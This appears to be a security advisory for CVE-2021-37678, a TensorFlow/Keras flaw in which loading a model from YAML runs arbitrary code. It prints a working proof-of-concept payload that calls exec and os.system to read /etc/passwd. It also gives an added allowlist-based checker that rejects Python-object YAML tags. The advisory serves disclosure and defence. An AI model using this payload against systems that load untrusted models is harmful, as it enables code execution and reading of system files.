CVE-2021-37678: Arbitrary code execution due to YAML deserialization
TensorFlow and Keras can be tricked into executing arbitrary code when deserializing a Keras model from YAML format.
```python
from tensorflow.keras import models
payload = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''
models.model_from_yaml(payload)
```
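As an added example (not code from TensorFlow or from this advisory), a standard-library pre-parse check that rejects YAML model files carrying Python-object tags like those in the payload above. The names `find_unsafe_tags`, `is_safe_to_parse` and the sample `BENIGN_MODEL` are assumptions made for illustration.

```python
import re

# Standard YAML data types: plain values that never instantiate Python objects.
CORE_TAGS = {"str", "int", "float", "bool", "null", "map", "seq",
             "binary", "timestamp", "set", "omap", "pairs"}

SECONDARY_TAG = re.compile(r"!!([^\s,\[\]{}]*)")  # e.g. !!python/name:exec
VERBATIM_TAG = re.compile(r"!<[^>\s]*>")          # e.g. !<tag:...>
TAG_DIRECTIVE = re.compile(r"^%TAG\b")            # directive that remaps tag handles

# The payload quoted in this advisory; it is only scanned here, never loaded.
ADVISORY_PAYLOAD = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''

# Constructed sample of a harmless model description.
BENIGN_MODEL = '''
class_name: Sequential
config:
  name: demo
  layers:
  - class_name: Dense
    config: {units: !!int 4, activation: relu}
'''

def find_unsafe_tags(text):
    """Return (line_number, token) for each tag outside the allowlist.

    Fails closed: matches inside quoted strings or comments are reported too,
    and every %TAG directive or verbatim tag is rejected regardless of target.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if TAG_DIRECTIVE.match(line):
            findings.append((lineno, line.strip()))
            continue
        findings += [(lineno, m.group(0)) for m in VERBATIM_TAG.finditer(line)]
        findings += [(lineno, m.group(0)) for m in SECONDARY_TAG.finditer(line)
                     if m.group(1) not in CORE_TAGS]
    return findings

def is_safe_to_parse(text):
    """True only when the document carries no tag outside the allowlist."""
    return not find_unsafe_tags(text)

if __name__ == "__main__":
    for lineno, token in find_unsafe_tags(ADVISORY_PAYLOAD):
        print(f"line {lineno}: rejected tag {token}")
```

This check is a gate in front of the parser, not a substitute for one: whatever parses an accepted file should still be a safe loader such as PyYAML's `yaml.safe_load`.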
References
- github.com/advisories/GHSA-r6jx-9g48-2r5r
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-591.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-789.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-300.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1df5a69e9f1a18a937e7907223066e606bf466b9
- github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012
- github.com/tensorflow/tensorflow/commit/8e47a685785bef8f81bcb996048921dfde08a9ab
- github.com/tensorflow/tensorflow/commit/a09ab4e77afdcc6e1e045c9d41d5edab63aafc1a
- github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
- nvd.nist.gov/vuln/detail/CVE-2021-37678